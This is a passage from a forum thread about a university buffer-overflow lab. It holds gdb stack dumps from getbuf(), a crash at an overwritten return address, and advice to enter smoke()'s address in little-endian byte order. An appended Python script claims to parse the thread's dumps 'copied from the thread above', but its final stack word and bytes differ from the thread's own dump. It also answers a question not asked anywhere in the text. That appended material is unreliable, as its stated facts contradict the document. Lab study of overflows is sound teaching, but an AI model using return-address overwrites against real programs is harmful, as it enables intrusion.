Breakpoint 3, 0x08048f51 in getbuf ()
(gdb) x/32xw $sp
0xbfffb3f0:     0xbfffb3fc      0x00000000      0x0804a108      0xbfffb434
0xbfffb400:     0x00857ff4      0x00000003      0xbfffb428      0x83e58955
0xbfffb410:     0x00000000      0x008584c0      0x08049983      0xbfffb434
0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
0xbfffb430:     0x08049983      0x000000f4      0x00003560      0x00000000
0xbfffb440:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb450:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb460:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) x/32b $sp
0xbfffb3f0:     0xfc    0xb3    0xff    0xbf    0x00    0x00    0x00    0x00
0xbfffb3f8:     0x08    0xa1    0x04    0x08    0x34    0xb4    0xff    0xbf
0xbfffb400:     0xf4    0x7f    0x85    0x00    0x03    0x00    0x00    0x00
0xbfffb408:     0x28    0xb4    0xff    0xbf    0x55    0x89    0xe5    0x83
(gdb) c
Continuing. 
Program received signal SIGSEGV, Segmentation fault.
0x83e58955 in ?? ()
(gdb) 


 

by: purewin | Posted on 2009-11-03 at 09:54:35 | ID: 25731584

Never mind, I had the wrong address for smoke(). Phase 0 done. Thanks for helping me! I really appreciate it.

 

by: Infinity08 | Posted on 2009-11-03 at 10:55:18 | ID: 25732178

Congratulations!

 

by: purewin | Posted on 2009-11-03 at 11:10:15 | ID: 25732345

Any chance you would care to help me out with phase 1? I've started another question here:
http://www.experts-exchange.com/Programming/Languages/Assembly/Q_24868074.html

 

by: Infinity08 | Posted on 2009-11-03 at 13:26:26 | ID: 25733919

I see there's no need any more :) You seem to be doing fine!

 

by: lecos | Posted on 2010-04-26 at 11:26:33 | ID: 32174893

Hi infinity,

I'm working on this lab, but when I use the address of smoke() (0x08048d90), I get an error.

Is this the correct address I should be using?

 

by: lecos | Posted on 2010-04-26 at 11:40:01 | ID: 32176093

Never mind... I was inputting the values incorrectly.

The way it is supposed to be is like: 90 8d 04 08

 

by: Infinity08 | Posted on 2010-04-26 at 12:57:20 | ID: 32182856

>> The way it is supposed to be is like: 90 8d 04 08

little endian byte order ;)
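
Added here as a worked example (not part of any post above, and not the lab's own tooling): a small Python script that parses the two gdb dumps quoted earlier in this thread (the `x/32b $sp` and `x/32xw $sp` output for the same 32 bytes of stack) and shows that they describe identical memory, answering the "do you read them across?" question and illustrating the little-endian point in this last reply. The address values are taken from the thread's own dumps; the function names are the example's own.

```python
import re
import struct

# gdb output copied from the thread above: the same 32 bytes of stack,
# once as `x/32b $sp` and once as `x/32xw $sp`.
BYTE_DUMP = """\
0xbfffb3f0:     0xfc    0xb3    0xff    0xbf    0x00    0x00    0x00    0x00
0xbfffb3f8:     0x08    0xa1    0x04    0x08    0x34    0xb4    0xff    0xbf
0xbfffb400:     0xf4    0x7f    0x85    0x00    0x03    0x00    0x00    0x00
0xbfffb408:     0x28    0xb4    0xff    0xbf    0x7e    0x8f    0x04    0x08
"""
WORD_DUMP = """\
0xbfffb3f0:     0xbfffb3fc      0x00000000      0x0804a108      0xbfffb434
0xbfffb400:     0x00857ff4      0x00000003      0xbfffb428      0x08048f7e
"""

LINE_RE = re.compile(r"^\s*0x([0-9a-fA-F]+):\s+(.*)$")

def parse_dump(text, width):
    """Parse `x/Nb` (width=1) or `x/Nxw` (width=4) output into
    (start_address, bytes). Each word is stored low byte first, which is
    how the little-endian x86 target holds it. Raises on an address gap."""
    fmt = {1: "<B", 4: "<I"}[width]
    start = expected = None
    out = bytearray()
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # prompt, "Continuing.", etc.
        addr = int(m.group(1), 16)
        if start is None:
            start = addr
        elif addr != expected:
            raise ValueError(f"gap in dump at {addr:#x}")
        vals = [int(tok, 16) for tok in m.group(2).split()]
        out += b"".join(struct.pack(fmt, v) for v in vals)
        expected = addr + width * len(vals)
    return start, bytes(out)

def word_at(start, data, addr):
    """The 32-bit little-endian word stored at `addr` in the dump."""
    off = addr - start
    return struct.unpack_from("<I", data, off)[0]

def le_bytes(word):
    """Byte values, lowest address first, that hold `word` in memory."""
    return list(struct.pack("<I", word))
```

Reading across a byte dump line by line gives the bytes in address order; `word_at` regroups four of them into the word `x/xw` prints, and `le_bytes` goes the other way, which is why 0xbfffb434 appears in the byte dump as 34 b4 ff bf.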
